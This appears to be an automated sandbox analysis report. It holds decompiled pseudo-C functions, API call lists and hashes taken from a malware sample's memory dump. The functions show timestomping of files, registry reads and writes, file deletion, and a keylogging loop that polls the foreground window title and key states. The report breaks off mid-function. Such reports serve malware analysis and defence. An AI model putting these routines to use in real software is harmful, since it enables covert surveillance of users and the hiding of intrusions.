			}









                                    0x2401766f
                                    0x24017675
                                    0x2401767c
                                    0x2401767d
                                    0x24017682
                                    0x24017685
                                    0x24017697
                                    0x240176a9
                                    0x240176c7
                                    0x240176cc
                                    0x240176d1
                                    0x240176dc
                                    0x240176ea
                                    0x240176f8
                                    0x240176f8
                                    0x240176fe
                                    0x24017705
                                    0x24017708
                                    0x2401770b
                                    0x24017718

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176C7
                                    • SetFileTime.KERNEL32(00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176DC
                                    • SetFileTime.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000), ref: 240176EA
                                    • SetFileTime.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000), ref: 240176F8
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176FE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Time$CloseCreateHandle
                                    • String ID:
                                    • API String ID: 670991709-0
                                    • Opcode ID: a205142b3e9cca52833549056e572b61dc8a98cc8248461bd7ae84f243a364f1
                                    • Instruction ID: e1d9c7707ed24edee1f0e1315ea43de611d75778717480072af269c3e6269ac6
                                    • Opcode Fuzzy Hash: a205142b3e9cca52833549056e572b61dc8a98cc8248461bd7ae84f243a364f1
                                    • Instruction Fuzzy Hash: 6911A5B4A40304BFF711D774DC92F9E77ECDB58708F600461B618FA1C5DB74AA808A24
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24017668, Relevance: 7.6, APIs: 5, Instructions: 62timefileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E24017668(char __eax, void* __ebx, void* __eflags) {
				char _v8;
				struct _FILETIME _v16;
				void* _t22;
				void* _t34;
				intOrPtr _t37;
				void* _t40;

				_v8 = __eax;
				E24013524(_v8);
				_push(_t40);
				_push(0x24017719);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40 + 0xfffffff4;
				_v16.dwLowDateTime = E24011D10(0x1869f) + 0x1c52fa0;
				_v16.dwHighDateTime = E24011D10(0x1869f) + 0x1c52fa0;
				_t22 = CreateFileA(E24013534(_v8), 0x40000000, 1, 0, 3, 0x2000000, 0); // executed
				_t34 = _t22;
				if(_t34 != 0xffffffff) {
					SetFileTime(_t34, 0,  &_v16, 0); // executed
					SetFileTime(_t34, 0, 0,  &_v16); // executed
					SetFileTime(_t34,  &_v16, 0, 0); // executed
				}
				CloseHandle(_t34); // executed
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E24017720);
				return E24013088( &_v8);
			}









                                    0x2401766f
                                    0x24017675
                                    0x2401767c
                                    0x2401767d
                                    0x24017682
                                    0x24017685
                                    0x24017697
                                    0x240176a9
                                    0x240176c7
                                    0x240176cc
                                    0x240176d1
                                    0x240176dc
                                    0x240176ea
                                    0x240176f8
                                    0x240176f8
                                    0x240176fe
                                    0x24017705
                                    0x24017708
                                    0x2401770b
                                    0x24017718

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176C7
                                    • SetFileTime.KERNEL32(00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176DC
                                    • SetFileTime.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000), ref: 240176EA
                                    • SetFileTime.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000), ref: 240176F8
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176FE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Time$CloseCreateHandle
                                    • String ID:
                                    • API String ID: 670991709-0
                                    • Opcode ID: 56ded2460fc724d0f295d78eb3d18c500077e5e50686cf618aa8a6c10fa19445
                                    • Instruction ID: 659e7c2307cda926b955b05c49b93f7f10d92c8ba746da9942bafb788355387c
                                    • Opcode Fuzzy Hash: 56ded2460fc724d0f295d78eb3d18c500077e5e50686cf618aa8a6c10fa19445
                                    • Instruction Fuzzy Hash: 1311A5B4A40304BEF711D774DC92F9E77ECDB58708F600461B618FA1C5DB74AA808A24
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240170B8, Relevance: 6.1, APIs: 4, Instructions: 83registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E240170B8(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				long _t35;
				long _t46;
				intOrPtr _t66;
				void* _t72;
				char* _t73;
				void* _t76;

				_v12 = __ecx;
				_v8 = __edx;
				_t72 = __eax;
				_t60 = _a4;
				E24013524(_v8);
				E24013524(_v12);
				E24013524(_a8);
				_push(_t76);
				_push(0x24017197);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76 + 0xffffffec;
				E240130DC(_a4, _a8);
				_t35 = RegOpenKeyExA(_t72, E24013534(_v8), 0, 1,  &_v16); // executed
				if(_t35 == 0) {
					_t73 = E24013534(_v12);
					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
					if(_t46 == 0) {
						E240136BC(_t60, _v24);
						RegQueryValueExA(_v16, _t73, 0,  &_v20, E24013534( *_t60),  &_v24); // executed
						E240136BC(_t60, _v24 - 1);
					}
					RegCloseKey(_v16); // executed
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E2401719E);
				E240130AC( &_v12, 2);
				return E24013088( &_a8);
			}














                                    0x240170c0
                                    0x240170c3
                                    0x240170c6
                                    0x240170c8
                                    0x240170ce
                                    0x240170d6
                                    0x240170de
                                    0x240170e5
                                    0x240170e6
                                    0x240170eb
                                    0x240170ee
                                    0x240170f6
                                    0x2401710d
                                    0x24017114
                                    0x2401712a
                                    0x24017131
                                    0x24017138
                                    0x2401713f
                                    0x2401715b
                                    0x24017166
                                    0x24017166
                                    0x2401716f
                                    0x2401716f
                                    0x24017176
                                    0x24017179
                                    0x2401717c
                                    0x24017189
                                    0x24017196

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,24017197,?,?,?), ref: 2401710D
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,24017197,?,?,?), ref: 24017131
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 2401715B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,24017197), ref: 2401716F
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: ce6ba991ddf6a600ee6b0a027aa80988b8c85487e56726ec2176fdfdd9b6323b
                                    • Instruction ID: c756bbbe93056c70c21f8ba61cc9fe60dbc89fb361fcddfeaeb64842cabb1db9
                                    • Opcode Fuzzy Hash: ce6ba991ddf6a600ee6b0a027aa80988b8c85487e56726ec2176fdfdd9b6323b
                                    • Instruction Fuzzy Hash: 5821FF75A00508ABFF01DBA8DD91EAEB7FCEF58604F504165F518E7254D770EE448B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016CE4, Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E24016CE4(char __eax, void* __ebx, intOrPtr __ecx, long* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				long _v16;
				void* _t17;
				void* _t23;
				long* _t36;
				intOrPtr _t42;
				void* _t46;
				void* _t51;
				void* _t53;

				_t53 = __eflags;
				_push(__ebx);
				_v12 = __ecx;
				_t36 = __edx;
				_v8 = __eax;
				E24013524(_v8);
				_push(_t51);
				_push(0x24016d92);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff4;
				E24013088(_v12);
				_t17 = E24016C78(_v8, _t36, _t53); // executed
				_t54 = _t17;
				if(_t17 != 0) {
					_t23 = CreateFileA(E24013534(_v8), 0x80000000, 1, 0, 3, 0, 0); // executed
					_t46 = _t23;
					 *_t36 = GetFileSize(_t46, 0);
					_t48 = E24011344( *_t36);
					ReadFile(_t46, _t26,  *_t36,  &_v16, 0); // executed
					E24013174(_v12,  *_t36, _t48, _t54);
					E2401135C(_t48);
					CloseHandle(_t46); // executed
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(E24016D99);
				return E24013088( &_v8);
			}













                                    0x24016ce4
                                    0x24016cea
                                    0x24016ced
                                    0x24016cf0
                                    0x24016cf2
                                    0x24016cf8
                                    0x24016cff
                                    0x24016d00
                                    0x24016d05
                                    0x24016d08
                                    0x24016d0e
                                    0x24016d16
                                    0x24016d1b
                                    0x24016d1d
                                    0x24016d37
                                    0x24016d3c
                                    0x24016d46
                                    0x24016d4f
                                    0x24016d5c
                                    0x24016d68
                                    0x24016d71
                                    0x24016d77
                                    0x24016d77
                                    0x24016d7e
                                    0x24016d81
                                    0x24016d84
                                    0x24016d91

                                    APIs
                                      • Part of subcall function 24016C78: FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                      • Part of subcall function 24016C78: FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,24016D92,?,?,?,00000000), ref: 24016D37
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,24016D92,?,?,?,00000000), ref: 24016D41
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,24016D92), ref: 24016D5C
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 24016D77
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseFind$CreateFirstHandleReadSize
                                    • String ID:
                                    • API String ID: 2300874643-0
                                    • Opcode ID: c152adff0e670b4cefb6603cfd2a00a3328a8aa5145a76ecf437b271950dc9b2
                                    • Instruction ID: 8b64a34a4713e86c3cbc782a42c4c394800181e4e0682710792d5f4154c7fdd8
                                    • Opcode Fuzzy Hash: c152adff0e670b4cefb6603cfd2a00a3328a8aa5145a76ecf437b271950dc9b2
                                    • Instruction Fuzzy Hash: F6113070A00604BFFB11DBA4CC91F6E7BF8DF5AB08F5000A4F508EB298DA706E419655
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016DA0, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E24016DA0(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				void* _t17;
				void* _t28;
				intOrPtr _t33;
				long _t36;
				void* _t39;

				_t36 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E24013524(_v8);
				E24013524(_v12);
				_push(_t39);
				_push(0x24016e3a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff4;
				_t17 = CreateFileA(E24013534(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
				_t28 = _t17;
				if(_t28 != 0xffffffff) {
					if(_t36 == 0xffffffff) {
						SetFilePointer(_t28, 0, 0, 0);
					}
					WriteFile(_t28, E24013588( &_v12), _t36,  &_v16, 0); // executed
					CloseHandle(_t28); // executed
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E24016E41);
				return E240130AC( &_v12, 2);
			}











                                    0x24016da8
                                    0x24016daa
                                    0x24016dad
                                    0x24016db3
                                    0x24016dbb
                                    0x24016dc2
                                    0x24016dc3
                                    0x24016dc8
                                    0x24016dcb
                                    0x24016de6
                                    0x24016deb
                                    0x24016df0
                                    0x24016df5
                                    0x24016dfe
                                    0x24016dfe
                                    0x24016e14
                                    0x24016e1a
                                    0x24016e1a
                                    0x24016e21
                                    0x24016e24
                                    0x24016e27
                                    0x24016e39

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,24016E3A,?,2406330C,00000000), ref: 24016DE6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,24016E3A,?,2406330C,00000000), ref: 24016DFE
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,24016E3A,?,2406330C), ref: 24016E14
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,24016E3A), ref: 24016E1A
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 9c10716a017262dec08191e6d730ba0fda94126424136afbece318bd25122b54
                                    • Instruction ID: 5e14e521d40f77ff0ffafe4323b17e38724db65e878e450249dc7196e2eec2cc
                                    • Opcode Fuzzy Hash: 9c10716a017262dec08191e6d730ba0fda94126424136afbece318bd25122b54
                                    • Instruction Fuzzy Hash: E711D670A003047BFB10D7B4DC92F9EBAECDB55B28F600661B518F71D4DAB06E808554
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24038260, Relevance: 6.0, APIs: 4, Instructions: 25windowsleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24038260(struct tagMSG* __eax) {
				int _t3;
				int _t7;
				MSG* _t8;

				_t8 = __eax;
				_t7 = 0;
				_t3 = PeekMessageA(__eax, 0, 0, 0, 1); // executed
				if(_t3 != 0) {
					_t7 = 1;
					if(_t8->message != 0x12) {
						TranslateMessage(_t8);
						DispatchMessageA(_t8);
					}
				}
				Sleep(0x14); // executed
				return _t7;
			}






                                    0x24038262
                                    0x24038264
                                    0x2403826f
                                    0x24038276
                                    0x24038278
                                    0x2403827e
                                    0x24038281
                                    0x24038287
                                    0x24038287
                                    0x2403827e
                                    0x2403828e
                                    0x24038297

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 2403826F
                                    • TranslateMessage.USER32 ref: 24038281
                                    • DispatchMessageA.USER32 ref: 24038287
                                    • Sleep.KERNEL32(00000014,?,2405B9C4,240382A2), ref: 2403828E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: 5b8e39013756ac92f66ab1ed471163146afefbc0c30940ddccd909afdcd235f4
                                    • Instruction ID: 26f70061a20bdd4f842552a75aa6ff1f1e3d90af3555c4690711033c8d8bbf7d
                                    • Opcode Fuzzy Hash: 5b8e39013756ac92f66ab1ed471163146afefbc0c30940ddccd909afdcd235f4
                                    • Instruction Fuzzy Hash: DDE05E32382B303AFB6166A40C82FDF6AC84F22B8EF544175F709BF0C4C6D1598042AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016634, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 52%
                                    			E24016634(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				int _t24;
				intOrPtr _t36;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t45 = __eflags;
				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_push(__ebx);
				_v8 = __eax;
				E24013524(_v8);
				_push(_t42);
				_push(0x240166d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_v9 = 0;
				_t13 = E24016C78(_v8, __ebx, _t45); // executed
				if(_t13 != 0) {
					_push(_t42);
					_push(0x240166b3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					_t40 = E24013534(_v8);
					GetFileAttributesA(_t40); // executed
					SetFileAttributesA(_t40, 0); // executed
					_t24 = DeleteFileA(_t40); // executed
					asm("sbb eax, eax");
					_v9 = _t24 + 1;
					_pop(_t37);
					 *[fs:eax] = _t37;
				}
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E240166DA);
				return E24013088( &_v8);
			}














                                    0x24016634
                                    0x24016635
                                    0x24016637
                                    0x2401663a
                                    0x2401663d
                                    0x24016643
                                    0x2401664a
                                    0x2401664b
                                    0x24016650
                                    0x24016653
                                    0x24016656
                                    0x2401665d
                                    0x24016664
                                    0x24016668
                                    0x24016669
                                    0x2401666e
                                    0x24016671
                                    0x2401667c
                                    0x2401667f
                                    0x24016695
                                    0x2401669b
                                    0x240166a3
                                    0x240166a6
                                    0x240166ab
                                    0x240166ae
                                    0x240166ae
                                    0x240166bf
                                    0x240166c2
                                    0x240166c5
                                    0x240166d2

                                    APIs
                                      • Part of subcall function 24016C78: FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                      • Part of subcall function 24016C78: FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,240166B3,?,00000000,240166D3,?,?,?,2405B97C), ref: 2401667F
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,240166B3,?,00000000,240166D3,?,?,?,2405B97C), ref: 24016695
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,240166B3,?,00000000,240166D3,?,?,?,2405B97C), ref: 2401669B
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: a2760cd4d22ede524bd63032f08b60f7a1757eb047a1e1b3cb63d1959e79f28f
                                    • Instruction ID: 0f868d49b0c4ac7066a788b533986eed2bc62b926bd6142e2be0c5c97462f51a
                                    • Opcode Fuzzy Hash: a2760cd4d22ede524bd63032f08b60f7a1757eb047a1e1b3cb63d1959e79f28f
                                    • Instruction Fuzzy Hash: C4116631614244AFFB02CBB4DC21A9FBBECDB2AA08F5208B4E808D2640D6755F50C961
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016858, Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E24016858(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _t28;
				char* _t30;
				long _t34;
				intOrPtr _t49;
				void* _t52;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t52 = __eax;
				E24013524(_v8);
				E24013524(_v12);
				E24013524(_a4);
				_push(_t55);
				_push(0x240168fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffff4;
				RegCreateKeyA(_t52, E24013534(_v8),  &_v16); // executed
				_t28 = E2401333C(_a4);
				_t30 = E24013534(_a4);
				_t34 = RegSetValueExA(_v16, E24013534(_v12), 0, 2, _t30, _t28); // executed
				if(_t34 == 0) {
				}
				RegCloseKey(_v16); // executed
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E24016904);
				E240130AC( &_v12, 2);
				return E24013088( &_a4);
			}












                                    0x24016860
                                    0x24016863
                                    0x24016866
                                    0x2401686b
                                    0x24016873
                                    0x2401687b
                                    0x24016882
                                    0x24016883
                                    0x24016888
                                    0x2401688b
                                    0x2401689e
                                    0x240168a6
                                    0x240168af
                                    0x240168c6
                                    0x240168cd
                                    0x240168cd
                                    0x240168d5
                                    0x240168dc
                                    0x240168df
                                    0x240168e2
                                    0x240168ef
                                    0x240168fc

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 2401689E
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168C6
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168D5
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID:
                                    • API String ID: 1818849710-0
                                    • Opcode ID: 7d43796703afa1c0fbfd6100e6e37c697ad78559f9aa42f935fc15b08382d96c
                                    • Instruction ID: 9243f166b6b1c28704da6bdfb96b9cc77dd8544df6249d0cfac429592347df8f
                                    • Opcode Fuzzy Hash: 7d43796703afa1c0fbfd6100e6e37c697ad78559f9aa42f935fc15b08382d96c
                                    • Instruction Fuzzy Hash: 9111ECB5900108BFFF01EBA8DD91E9EBBECAF18648F5144A5B808E7254DA709E818A50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24052464, Relevance: 4.6, APIs: 3, Instructions: 51sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 74%
                                    			E24052464() {
				char _v8;
				intOrPtr _v36;
				long _t11;
				void* _t12;
				long _t21;
				void* _t22;
				intOrPtr* _t34;
				void* _t37;

				_push(0);
				_push(_t21);
				_push(0x2405250d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t34;
				while(1) {
					Sleep(1); // executed
					E2401794C( &_v8, _t21, _t22, 0x24063304, 0x2406330c); // executed
					E240130DC(0x2406330c, _v8);
					E2405038C(_t21, 0x24063304, 0x2406330c);
					_t11 = GetTickCount();
					_push(0);
					_push(_t11);
					_t3 = _t21 + 0x12c; // 0x12c
					_t12 = _t3;
					asm("cdq");
					if(0 != _v36) {
						goto L4;
					}
					L2:
					_t37 = _t12 -  *_t34;
					if(_t37 >= 0) {
						continue;
					} else {
						L5:
						E24013480( *0x24063304,  *0x2406330c);
						if(_t37 != 0) {
							_t38 =  *0x24063308 - 1;
							if( *0x24063308 == 1) {
								E24052240(_t21, 0x24063304, 0x2406330c, _t38);
								 *0x24063308 = 0;
							}
							E240130DC(0x24063304,  *0x2406330c);
							_t21 = GetTickCount();
						}
						while(1) {
							Sleep(1); // executed
							E2401794C( &_v8, _t21, _t22, 0x24063304, 0x2406330c); // executed
							E240130DC(0x2406330c, _v8);
							E2405038C(_t21, 0x24063304, 0x2406330c);
							_t11 = GetTickCount();
							_push(0);
							_push(_t11);
							_t3 = _t21 + 0x12c; // 0x12c
							_t12 = _t3;
							asm("cdq");
							if(0 != _v36) {
								goto L4;
							}
							goto L2;
						}
					}
					L4:
					if(__eflags >= 0) {
						continue;
					}
					goto L5;
				}
			}











                                    0x24052467
                                    0x24052469
                                    0x24052479
                                    0x2405247e
                                    0x24052481
                                    0x24052484
                                    0x24052486
                                    0x2405248e
                                    0x24052498
                                    0x2405249d
                                    0x240524a2
                                    0x240524a9
                                    0x240524aa
                                    0x240524ab
                                    0x240524ab
                                    0x240524b1
                                    0x240524b6
                                    0x00000000
                                    0x00000000
                                    0x240524b8
                                    0x240524b8
                                    0x240524bd
                                    0x00000000
                                    0x240524bf
                                    0x240524c5
                                    0x240524c9
                                    0x240524ce
                                    0x240524d0
                                    0x240524d7
                                    0x240524d9
                                    0x240524de
                                    0x240524de
                                    0x240524e9
                                    0x240524f3
                                    0x240524f3
                                    0x24052484
                                    0x24052486
                                    0x2405248e
                                    0x24052498
                                    0x2405249d
                                    0x240524a2
                                    0x240524a9
                                    0x240524aa
                                    0x240524ab
                                    0x240524ab
                                    0x240524b1
                                    0x240524b6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240524b6
                                    0x24052484
                                    0x240524c1
                                    0x240524c3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240524c3

                                    APIs
                                    • Sleep.KERNEL32(00000001,00000000,2405250D,?,?,?,?,00000000), ref: 24052486
                                      • Part of subcall function 2401794C: GetForegroundWindow.USER32(00000000,240179B9,?,24063304,2406330C,?,00000000,?,24052493,00000001,00000000,2405250D), ref: 2401796B
                                      • Part of subcall function 2401794C: GetWindowTextLengthA.USER32(00000000), ref: 24017977
                                      • Part of subcall function 2401794C: GetWindowTextA.USER32(00000000,00000000,00000001), ref: 24017994
                                      • Part of subcall function 2405038C: GetAsyncKeyState.USER32(00000008), ref: 240503C9
                                      • Part of subcall function 2405038C: GetKeyState.USER32(00000014), ref: 240503EC
                                      • Part of subcall function 2405038C: GetKeyState.USER32(00000010), ref: 240503F9
                                    • GetTickCount.KERNEL32 ref: 240524A2
                                    • GetTickCount.KERNEL32 ref: 240524EE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: StateWindow$CountTextTick$AsyncForegroundLengthSleep
                                    • String ID:
                                    • API String ID: 3649555911-0
                                    • Opcode ID: 91c7310ca5d38c37ac4828fdf369e8172a3eef7ef3f4a4e96e0c25cd4990e72e
                                    • Instruction ID: 88ac6a5228864df4ce82301c609121cc8bfecb590a9422676e9ef9625203f763
                                    • Opcode Fuzzy Hash: 91c7310ca5d38c37ac4828fdf369e8172a3eef7ef3f4a4e96e0c25cd4990e72e
                                    • Instruction Fuzzy Hash: 4001D830204140EFF706DB95C890E5E7BD8FF99768F208469E4459F12ACAB19EC58EE2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24052460, Relevance: 4.6, APIs: 3, Instructions: 50sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E24052460() {
				char _v8;
				intOrPtr _v36;
				signed char _t5;
				long _t12;
				void* _t13;
				long _t22;
				void* _t23;
				intOrPtr* _t36;
				void* _t40;

				 *_t5 =  *_t5 & _t5;
				 *_t5 =  *_t5 + _t5;
				_push(0);
				_push(_t22);
				_push(_t36);
				_push(0x2405250d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				while(1) {
					Sleep(1); // executed
					E2401794C( &_v8, _t22, _t23, 0x24063304, 0x2406330c); // executed
					E240130DC(0x2406330c, _v8);
					E2405038C(_t22, 0x24063304, 0x2406330c);
